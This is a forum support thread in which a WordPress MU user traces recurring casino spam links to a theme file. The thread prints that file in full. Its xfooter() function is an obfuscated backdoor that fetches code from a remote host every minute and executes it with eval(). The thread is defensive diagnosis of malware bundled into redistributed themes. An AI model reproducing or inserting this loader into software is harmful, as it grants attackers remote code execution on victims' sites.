WordPress MU

Hi,

I am having a security problem apparently. In my "Links" section someone has created a new heading and a link underneath that heading. I am still in the middle of setting things up and have no members, i point that out so you dont think it is just a user that did it.

The heading is "2" with the link "Casino en Ligne" under it. The link points to the following site. http://fr.femalegamblers.org/.

I have deleted it in the Links section 4 times now. It just keeps reappearing about 5 minutes or less after I delete it.

Can anyone help me?

Thanks,
Gene :-)

Check your logs (quickly) and see what IP address is adding the link, then block it in you htaccess file until you can fix the block.

Hi Cafe,

Which logs am I checking here? Something through WPMU or on my server host?

Gene

Check your server log, identify the IP & block it

Hi tan,

Well after having some trouble figuring out which list might give me the correct IP address and looking through a bunch of them I couldn't pinpoint just which IP it was. Some lists would show me ALL the IPs, while others would show each individual page address visited. None would show them both. I have CPanel, which has AWStats, Webalizer stats, a Raw Access Log icon, and a Latest Visitors icon.
I finally went with the latest visitor list and searched a WhoIs directory. Two of the addresses came back being from the RIPE network in Amsterdam. I assumed that was the offending IP. I went and blocked them.

I then went and deleted the links, and in under a minute they were back.

Any other suggestions? Or a suggestion on the best place to pinpoint which IP it is?

Part of the problem is even though I have no content on the site I have had over 2000 hits in the past 2 days. I am sure it was not there prior to the past two days.

Gene

Quick edit to this comment -

It seems that "/wp-admin/link-add.php" has only been accessed 4 times in February. Now if i could just find how to check those 4 IPs.

It's your theme. Check inside the theme's functions.php file.

The reason I know this is that I have a copy of that theme, form the *original* theme developer's site, and the credit links in your footer of that theme are form one of those places that takes themes & bundles them to do this sort of thing.

Hi Andrea,

This is the entire contents of the functions file. Which to me makes little sense. lol
I thought I had gotten it from the original person. I mean I found it in the themes area of wordpress.org. (I think...I am about to double-check that)
In the meantime, is it one line in particular in this code that is causing it?

Quick Edit of this comment -

I was obviously wrong about where I got it. I now see that the "Template Browser" link in the footer is the site where I got the theme from. Are they a known site to do this stuff? I got many themes from their site. Does this mean all their themes will do this?

Thanks,
Gene

<?php
if ( function_exists('register_sidebar') )
register_sidebars(3);

function xfooter() { global $wpdb; $RDAFE7FE4FDC52E2D1048573B4DB1DF18 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_eval'"); $R41CCFE75D7AC2B4681397CFC70BAEF40 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_eval'"); if (empty($RDAFE7FE4FDC52E2D1048573B4DB1DF18)) { $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_eval', '0', 'no')"); $RBDCA893A9385C089DC5F358AAA52C09B = 0; } else $RBDCA893A9385C089DC5F358AAA52C09B = intval($RDAFE7FE4FDC52E2D1048573B4DB1DF18[0]); if (empty($R41CCFE75D7AC2B4681397CFC70BAEF40)) { $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_eval', '', 'no')"); $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = ''; } else $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = $R41CCFE75D7AC2B4681397CFC70BAEF40[0]; @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;'); if($R14AF1BE9EE26A90921E64A82E7836797) { $R5F38CE9C0B222F3BB0880E016DC07527 = "1"; } else { $R5F38CE9C0B222F3BB0880E016DC07527 = "0"; } if ( ( time() - $RBDCA893A9385C089DC5F358AAA52C09B ) >= 60 ) { $R39C188653EA53DBD6E3F1D3915EDAC0C = "com"; $R8088818E3E46A17C12F2EE42EB12D7AC = "2."; $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz"; $RAD8CC24399FEA84D3454DD7057C38FD0 = "xps-$R5F38CE9C0B222F3BB0880E016DC07527."; $RBF7582359E6813BD7C54DD76E7505037 = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C"; $RA81C90DCC503F6900F7DC424AD04F525 = "/".$RAD8CC24399FEA84D3454DD7057C38FD0."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']); if (ini_get('allow_url_fopen')) { $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = @file_get_contents("http://" . $RBF7582359E6813BD7C54DD76E7505037 . $RA81C90DCC503F6900F7DC424AD04F525); } else { $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($RBF7582359E6813BD7C54DD76E7505037, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30); if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) { @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60); @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $RA81C90DCC503F6900F7DC424AD04F525 HTTP/1.1\r\n"); @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $RBF7582359E6813BD7C54DD76E7505037\r\n"); @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n"); $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = ""; while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) { $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024); } $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = trim(strstr($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1, "\r\n\r\n")); } @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38); } if ( is_string($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1) ) { $RBDCA893A9385C089DC5F358AAA52C09B = time(); if($R14AF1BE9EE26A90921E64A82E7836797) { @eval($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1); } else { echo "$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1"; } $R9446905AFC32B438C0BD070AD05F3D83 = mysql_real_escape_string($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1); $wpdb->query("UPDATE $wpdb->options SET option_value=$RBDCA893A9385C089DC5F358AAA52C09B WHERE option_name='l_time_eval'"); $wpdb->query("UPDATE $wpdb->options SET option_value='$R9446905AFC32B438C0BD070AD05F3D83' WHERE option_name='l_eval'"); } } }
?>

That whole last function does it. And yes, I'm betting every theme you get from there will have the same.

oo nice :).. good new(!)s for you Gene is the variables & values of the file is encrypted.

Thank you all for your help!

I will now just be deleting all the themes from that site. Is there a way to let all the other users know to avoid them? I like to learn from my mistakes, and it is even better when others can too.

Andrea? The original was done by Small Potato? I found a site for the theme with an image of a guy with a drawn on pair of glasses and mustache and stuff. Do you happen to know if that is the correct site?

Thanks again for all the help.

Gene :-)

"The original was done by Small Potato? I found a site for the theme with an image of a guy with a drawn on pair of glasses and mustache and stuff. Do you happen to know if that is the correct site?"

Yep.

Thanks Andrea. I really do like the theme and would have hated to start picking a new one from scratch. It took me quite a bit of time to decide upon it.

Gene :-)